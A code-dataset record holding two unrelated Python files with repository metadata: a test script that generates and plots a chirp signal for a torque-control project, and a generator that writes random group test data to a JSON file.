python/dynamic_graph/sot/torque_control/tests/test_chirp.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
python/dynamic_graph/sot/torque_control/tests/test_chirp.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 28 16:54:01 2015
Test the expressions for the acceleration limits that guarantee the feasibility
of the position and velocity limits in the feature.
These expression have been derived using the viability theory.
@author: adelpret
"""
import numpy as np
from numpy.random import random
from plot_utils import create_empty_figure
import plot_utils
import matplotlib.pyplot as plt
plot_utils.DEFAULT_LINE_WIDTH = 5;
N = 15000;
f0 = 0.3;
f1 = 3;
tt = 15.0;
dt = 0.001;
phi_0 = np.pi*tt*(f0-f1);
t = 0;
x = np.zeros(N);
f = np.zeros(N);
phi = np.zeros(N);
k = 2*(f1-f0)/tt;
for i in range(N):
if(t<0.5*tt):
f[i] = f0 + k*t;
phi[i] = 2*np.pi*t*(f0+0.5*k*t);
else:
f[i] = f1 + 0.5*k*tt - k*t;
phi[i] = phi_0 + 2*np.pi*t*(f1+0.5*k*tt - 0.5*k*t);
x[i] = 0.5*(1.0-np.cos(phi[i]));
t = t + dt;
(fig,ax) = create_empty_figure(3,1);
ax[0].plot(x);
ax[1].plot(f);
ax[2].plot(phi);
plt.show();
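# Sanity check (illustrative, reusing the arrays built above): the
# instantaneous frequency is the phase derivative divided by 2*pi, so on the
# rising half of the chirp np.diff(phi)/(2*np.pi*dt) should track f to within
# roughly k*dt.
#
#   half = int(0.5*tt/dt)
#   assert np.allclose(np.diff(phi[:half])/(2*np.pi*dt), f[1:half], atol=k*dt)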
| 21.326087
| 80
| 0.618756
|
38f175529ae3c623979e0a8341957f8393ce5412
| 992
|
py
|
Python
|
generator/group.py
|
nikor1337/python_training
|
675e0209ec50696fc294658bbcaa267752de79f0
|
[
"Apache-2.0"
] | null | null | null |
generator/group.py
|
nikor1337/python_training
|
675e0209ec50696fc294658bbcaa267752de79f0
|
[
"Apache-2.0"
] | null | null | null |
generator/group.py
|
nikor1337/python_training
|
675e0209ec50696fc294658bbcaa267752de79f0
|
[
"Apache-2.0"
] | 1
|
2021-02-24T06:55:52.000Z
|
2021-02-24T06:55:52.000Z
|
from model.group import Group
import random
import string
import os.path
import jsonpickle
import getopt
import sys
try:
opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number of groups", "file"])
except getopt.GetoptError as err:
    print(err)  # the getopt module has no usage(); report the parse error instead
sys.exit(2)
n = 5
f = "data/groups.json"
for o, a in opts:
if o == "-n":
n = int(a)
elif o == "-f":
f = a
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits + string.punctuation + " "*10
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
testdata = [Group(name="", header="", footer="")] + [
Group(name=random_string("name", 10), header=random_string("header", 10), footer=random_string("footer", 10))
for i in range(n)
]
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
with open(file, "w") as out:
jsonpickle.set_encoder_options("json", indent=2)
out.write(jsonpickle.encode(testdata))
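# Example invocation (hypothetical paths): generate 10 random groups and write
# them to data/groups.json relative to the project root.
#
#   python generator/group.py -n 10 -f "data/groups.json"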
| 25.435897
| 111
| 0.660282
|